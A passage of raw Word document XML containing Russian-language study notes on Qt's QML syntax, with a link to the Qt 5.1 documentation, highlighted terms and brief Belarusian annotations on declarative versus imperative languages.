      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>project</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-5.1/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>syntax</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>basics</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008A25E2" w:rsidRPr="00D815C8" w:rsidRDefault="009B0257" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>декларативный язык</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, который позволяет опреде</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">лить </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ы на основании их с</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>войств</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и того, как они соотносятся и откликаются на изменения в других </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ах. В </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>отличие от императивного кода</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, где </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">изменения в атрибутах и поведении выражаются через набор утверждений, которые обрабатываются шаг за шагом, декларативный синтаксис </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> интегрирует атрибуты и изменения в поведении в объявлении индивидуальных </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ов</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007B4D33" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="007B4D33" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>разнавіднасці моў – дэкларатыўная і імператыўная</w:t>
      </w:r>
      <w:r w:rsidR="007B4D33" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>імператыўнасць часткова схавана, але ёсць у тых жа джава-скрыпт выразах</w:t>
      </w:r>
      <w:r w:rsidR="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="009B0257" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> исходный код</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в общем </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>загружается</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> при помощи </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>движка</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> документы</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, которые являются отдельными документами </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> кода. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> документ</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> может иметь несколько </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>импортов</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> сверху файла. Это могут быть </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>версия пространства имён</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, в которую типы были зарегистрированы; относительная </w:t>
      </w:r>
      <w:r w:rsidR="00F850EA" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>директори</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">я, которая содержит </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">определения типов как </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> документы</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">файлы </w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">java </w:t>
      </w:r>
      <w:r w:rsidR="007F74BB" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее есть отдельная информация про импорт </w:t>
      </w:r>
      <w:r w:rsidR="004E4201" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">java </w:t>
      </w:r>
      <w:r w:rsidR="007F74BB" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Есть примеры импорта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Синтаксически блок </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> кода определяет </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">дерево </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
